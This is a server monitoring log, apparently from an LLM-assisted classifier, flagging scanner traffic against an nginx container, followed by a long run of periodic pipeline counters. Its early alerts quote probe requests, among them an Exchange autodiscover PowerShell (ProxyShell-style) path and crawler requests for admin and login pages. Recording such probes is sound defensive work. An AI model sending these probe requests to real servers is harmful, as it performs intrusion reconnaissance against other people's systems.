Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log from nginx referencing a missing security.txt file. This could be a casual misconfiguration or a scanner probing for security.txt; not clearly malicious but worth monitoring. Line=2026-03-20T09:48:42.685997983Z 2026/03/20 09:48:42 [error] 422#422: *748306 open() "/usr/share/nginx/default/security.txt" failed (2: No such file or directory), client: 66.132.172.201, server: _, req... Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.236464 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:48:42.686070852Z 66.132.172.201 - - [20/Mar/2026:09:48:42 +0000] "54.200.221.0" "GET /security.txt HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.cens... Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.523207 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:48:47.522897648Z 66.132.172.201 - - [20/Mar/2026:09:48:47 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x035\x85\x9D\x87\x92\x1D#8\x91nJ0\x19\x06j\xF4\xCE;\x8FSs\xF1aN\xDA\xA8\x9A... 
Mar 20 09:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:01.945485 [observer] Pipeline: processed=3970 pattern_hits=3890 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:01.945551 [observer] Patterns: hash=3890 prefix=0 regex=0 contains=0 deny=19 alert=295 suppress=0 misses=80 Mar 20 09:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:31.935198 [observer] Pipeline: processed=3972 pattern_hits=3892 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:49:31.935223 [observer] Patterns: hash=3892 prefix=0 regex=0 contains=0 deny=19 alert=295 suppress=0 misses=80 Mar 20 09:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:01.939874 [observer] Pipeline: processed=3976 pattern_hits=3896 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:01.939905 [observer] Patterns: hash=3896 prefix=0 regex=0 contains=0 deny=19 alert=295 suppress=0 misses=80 Mar 20 09:50:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:25.166291 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T09:50:25.165705488Z 216.180.246.228 - - [20/Mar/2026:09:50:25 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomec... Mar 20 09:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:31.052515 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. 
Line=2026-03-20T09:50:31.051004636Z 216.180.246.228 - - [20/Mar/2026:09:50:31 +0000] "54.200.221.0" "GET /manage/account/login HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://w... Mar 20 09:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:31.935424 [observer] Pipeline: processed=3980 pattern_hits=3900 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:31.935450 [observer] Patterns: hash=3900 prefix=0 regex=0 contains=0 deny=19 alert=297 suppress=0 misses=80 Mar 20 09:50:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:36.370883 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T09:50:36.370515930Z 216.180.246.228 - - [20/Mar/2026:09:50:36 +0000] "54.200.221.0" "GET /admin/index.html HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.n... Mar 20 09:50:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:50:40.148971 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T09:50:40.148677173Z 216.180.246.228 - - [20/Mar/2026:09:50:40 +0000] "54.200.221.0" "GET /index.html HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.c... 
Mar 20 09:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:01.958309 [observer] Pipeline: processed=3986 pattern_hits=3906 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:01.958344 [observer] Patterns: hash=3906 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:31.943837 [observer] Pipeline: processed=3988 pattern_hits=3908 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:51:31.943862 [observer] Patterns: hash=3908 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:01.995398 [observer] Pipeline: processed=3991 pattern_hits=3911 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:01.995443 [observer] Patterns: hash=3911 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:31.935848 [observer] Pipeline: processed=3994 pattern_hits=3914 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:52:31.935879 [observer] Patterns: hash=3914 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:01.963380 [observer] Pipeline: processed=3998 pattern_hits=3918 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:01.963418 [observer] Patterns: hash=3918 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:31.934067 [observer] Pipeline: processed=4002 pattern_hits=3922 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:53:31.934091 [observer] Patterns: 
hash=3922 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:01.956840 [observer] Pipeline: processed=4004 pattern_hits=3924 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:01.956871 [observer] Patterns: hash=3924 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:31.935542 [observer] Pipeline: processed=4008 pattern_hits=3928 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:54:31.935569 [observer] Patterns: hash=3928 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:01.953601 [observer] Pipeline: processed=4010 pattern_hits=3930 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:01.953633 [observer] Patterns: hash=3930 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:31.934393 [observer] Pipeline: processed=4013 pattern_hits=3933 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:55:31.934417 [observer] Patterns: hash=3933 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:01.943790 [observer] Pipeline: processed=4016 pattern_hits=3936 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:01.943821 [observer] Patterns: hash=3936 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:31.950603 [observer] Pipeline: processed=4018 pattern_hits=3938 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:56:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 09:56:31.950631 [observer] Patterns: hash=3938 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:01.947284 [observer] Pipeline: processed=4022 pattern_hits=3942 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:01.947464 [observer] Patterns: hash=3942 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:31.944696 [observer] Pipeline: processed=4024 pattern_hits=3944 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:57:31.944724 [observer] Patterns: hash=3944 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:01.938740 [observer] Pipeline: processed=4030 pattern_hits=3950 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:01.938770 [observer] Patterns: hash=3950 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:31.934197 [observer] Pipeline: processed=4032 pattern_hits=3952 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:58:31.934221 [observer] Patterns: hash=3952 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:01.948834 [observer] Pipeline: processed=4035 pattern_hits=3955 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:01.948961 [observer] Patterns: hash=3955 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 09:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:31.934051 [observer] Pipeline: 
processed=4038 pattern_hits=3958 llm_calls=80 llm_errors=1 learned=0 Mar 20 09:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:59:31.934082 [observer] Patterns: hash=3958 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:01.949138 [observer] Pipeline: processed=4040 pattern_hits=3960 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:01.949181 [observer] Patterns: hash=3960 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:31.937779 [observer] Pipeline: processed=4044 pattern_hits=3964 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:00:31.937804 [observer] Patterns: hash=3964 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:01.939482 [observer] Pipeline: processed=4046 pattern_hits=3966 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:01.939522 [observer] Patterns: hash=3966 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:31.934022 [observer] Pipeline: processed=4050 pattern_hits=3970 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:01:31.934047 [observer] Patterns: hash=3970 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:01.994311 [observer] Pipeline: processed=4052 pattern_hits=3972 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:01.994339 [observer] Patterns: hash=3972 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:02:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:31.935755 [observer] Pipeline: processed=4055 pattern_hits=3975 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:02:31.935781 [observer] Patterns: hash=3975 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:01.945350 [observer] Pipeline: processed=4060 pattern_hits=3980 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:01.945375 [observer] Patterns: hash=3980 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:31.949049 [observer] Pipeline: processed=4062 pattern_hits=3982 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:03:31.949077 [observer] Patterns: hash=3982 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:01.944973 [observer] Pipeline: processed=4066 pattern_hits=3986 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:01.945016 [observer] Patterns: hash=3986 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:31.934003 [observer] Pipeline: processed=4068 pattern_hits=3988 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:04:31.934029 [observer] Patterns: hash=3988 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:01.948735 [observer] Pipeline: processed=4072 pattern_hits=3992 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:01.948760 [observer] Patterns: hash=3992 
prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:31.936626 [observer] Pipeline: processed=4074 pattern_hits=3994 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:05:31.936653 [observer] Patterns: hash=3994 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:01.942985 [observer] Pipeline: processed=4077 pattern_hits=3997 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:01.943024 [observer] Patterns: hash=3997 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:31.940502 [observer] Pipeline: processed=4080 pattern_hits=4000 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:06:31.940524 [observer] Patterns: hash=4000 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:01.953651 [observer] Pipeline: processed=4082 pattern_hits=4002 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:01.953711 [observer] Patterns: hash=4002 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:31.934487 [observer] Pipeline: processed=4086 pattern_hits=4006 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:07:31.934512 [observer] Patterns: hash=4006 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:08:02.039946 [observer] Pipeline: processed=4090 pattern_hits=4010 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:08:02 ip-172-26-12-110 
observer[1565011]: 2026/03/20 10:08:02.039986 [observer] Patterns: hash=4010 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:08:31.935511 [observer] Pipeline: processed=4094 pattern_hits=4014 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:08:31.935542 [observer] Patterns: hash=4014 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:01.940779 [observer] Pipeline: processed=4096 pattern_hits=4016 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:01.940811 [observer] Patterns: hash=4016 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:31.935694 [observer] Pipeline: processed=4099 pattern_hits=4019 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:09:31.935721 [observer] Patterns: hash=4019 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:01.952517 [observer] Pipeline: processed=4102 pattern_hits=4022 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:01.952553 [observer] Patterns: hash=4022 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:31.950660 [observer] Pipeline: processed=4104 pattern_hits=4024 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:10:31.950684 [observer] Patterns: hash=4024 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:01.937693 [observer] Pipeline: processed=4108 
pattern_hits=4028 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:01.937719 [observer] Patterns: hash=4028 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:31.940735 [observer] Pipeline: processed=4110 pattern_hits=4030 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:11:31.940763 [observer] Patterns: hash=4030 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:01.959928 [observer] Pipeline: processed=4114 pattern_hits=4034 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:01.959957 [observer] Patterns: hash=4034 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:31.939459 [observer] Pipeline: processed=4116 pattern_hits=4036 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:12:31.939484 [observer] Patterns: hash=4036 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:01.983745 [observer] Pipeline: processed=4121 pattern_hits=4041 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:01.983779 [observer] Patterns: hash=4041 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:31.935331 [observer] Pipeline: processed=4124 pattern_hits=4044 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:13:31.935361 [observer] Patterns: hash=4044 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:14:01 ip-172-26-12-110 
observer[1565011]: 2026/03/20 10:14:01.965622 [observer] Pipeline: processed=4126 pattern_hits=4046 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:14:01.966772 [observer] Patterns: hash=4046 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:14:31.936203 [observer] Pipeline: processed=4130 pattern_hits=4050 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:14:31.936228 [observer] Patterns: hash=4050 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:01.945999 [observer] Pipeline: processed=4132 pattern_hits=4052 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:01.946025 [observer] Patterns: hash=4052 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:31.934202 [observer] Pipeline: processed=4136 pattern_hits=4056 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:15:31.934226 [observer] Patterns: hash=4056 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:01.944737 [observer] Pipeline: processed=4138 pattern_hits=4058 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:01.944768 [observer] Patterns: hash=4058 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:31.949470 [observer] Pipeline: processed=4140 pattern_hits=4060 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:16:31.949496 [observer] Patterns: hash=4060 prefix=0 regex=0 
contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:01.941898 [observer] Pipeline: processed=4144 pattern_hits=4064 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:01.941929 [observer] Patterns: hash=4064 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:31.934350 [observer] Pipeline: processed=4146 pattern_hits=4066 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:17:31.934377 [observer] Patterns: hash=4066 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:02.124236 [observer] Pipeline: processed=4150 pattern_hits=4070 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:02.124297 [observer] Patterns: hash=4070 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:31.944769 [observer] Pipeline: processed=4154 pattern_hits=4074 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:18:31.944801 [observer] Patterns: hash=4074 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:19:01.948063 [observer] Pipeline: processed=4158 pattern_hits=4078 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:19:01.948230 [observer] Patterns: hash=4078 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:19:31.942432 [observer] Pipeline: processed=4160 pattern_hits=4080 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:19:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 10:19:31.942464 [observer] Patterns: hash=4080 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:01.960518 [observer] Pipeline: processed=4162 pattern_hits=4082 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:01.960638 [observer] Patterns: hash=4082 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:31.940585 [observer] Pipeline: processed=4166 pattern_hits=4086 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:20:31.940609 [observer] Patterns: hash=4086 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:01.966669 [observer] Pipeline: processed=4168 pattern_hits=4088 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:01.966802 [observer] Patterns: hash=4088 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:31.934959 [observer] Pipeline: processed=4172 pattern_hits=4092 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:21:31.934986 [observer] Patterns: hash=4092 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:22:01.957028 [observer] Pipeline: processed=4174 pattern_hits=4094 llm_calls=80 llm_errors=1 learned=0 Mar 20 10:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:22:01.957073 [observer] Patterns: hash=4094 prefix=0 regex=0 contains=0 deny=19 alert=299 suppress=0 misses=80 Mar 20 10:22:31 ip-172-26-12-110 